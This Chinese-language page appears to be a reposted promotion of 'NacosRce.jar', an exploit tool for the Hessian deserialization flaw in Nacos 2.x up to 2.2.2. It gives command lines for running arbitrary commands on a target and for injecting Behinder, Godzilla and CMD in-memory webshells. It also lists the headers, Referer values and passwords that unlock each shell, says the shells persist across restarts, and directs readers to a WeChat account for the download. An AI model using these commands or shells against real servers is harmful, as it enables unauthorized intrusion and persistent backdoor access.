6!Nacos反序列化漏洞利用工具v0.5

项目简介

刨洞安全@凉风 师傅写的一个 Nacos Hessian 反序列化漏洞利用工具,目前已更新到v0.5,欢迎Star!

关注【Hack分享吧】公众号,回复关键字【230706】获取下载链接

6!Nacos反序列化漏洞利用工具v0.5_第1张图片

使用方法

1. 自动注入内存马并执行命令 java -jar NacosRce.jar Url Jraft端口 "Command"

java -jar NacosRce.jar http://192.168.90.1:8848  7848 "whoami"

2. 只注入内存马

java -jar NacosRce.jar http://192.168.90.1:8848 7848 memshell

一、冰蝎内存马:

需要设置请求头x-client-data:rebeyond
设置Referer:https://www.google.com/
路径随意
密码rebeyond

6!Nacos反序列化漏洞利用工具v0.5_第2张图片

二、哥斯拉内存马:

需要设置请求头x-client-data:godzilla
设置Referer:https://www.google.com/
路径随意
密码是pass和key

6!Nacos反序列化漏洞利用工具v0.5_第3张图片

三、CMD内存马:

需要设置请求头x-client-data:cmd
设置Referer:https://www.google.com/
请求头cmd:要执行的命令

6!Nacos反序列化漏洞利用工具v0.5_第4张图片

v0.5版本实现了

不出网漏洞利用
可多次发起漏洞利用
同时注入冰蝎/哥斯拉/CMD内存马
内存马对nacos多版本进行了兼容
修复windows的bug

 tips:

请用jdk1.8
适用于Nacos 2.x <= 2.2.2
非集群的也能打哦
此内存马重启nacos依然存活

注意事项

Windows如用下面的方式执行,注入内存马时会在以下目录生成两个临时文件

java -jar NacosRce.jar http://192.168.90.1:8848  7848 "whoami" windows

C:\Windows\Temp\nacos_data_temp
C:\Windows\Temp\nacos_data_temp.class

如果没有在最后加windows,临时文件会在以下目录,所以权限足够的话,不指定windows也能打成功,没打成功也许是因为没权限操作C盘或其他原因

/tmp/nacos_data_temp
/tmp/nacos_data_temp.class

你可能感兴趣的:(安全工具,安全,内存马,java,Nacos)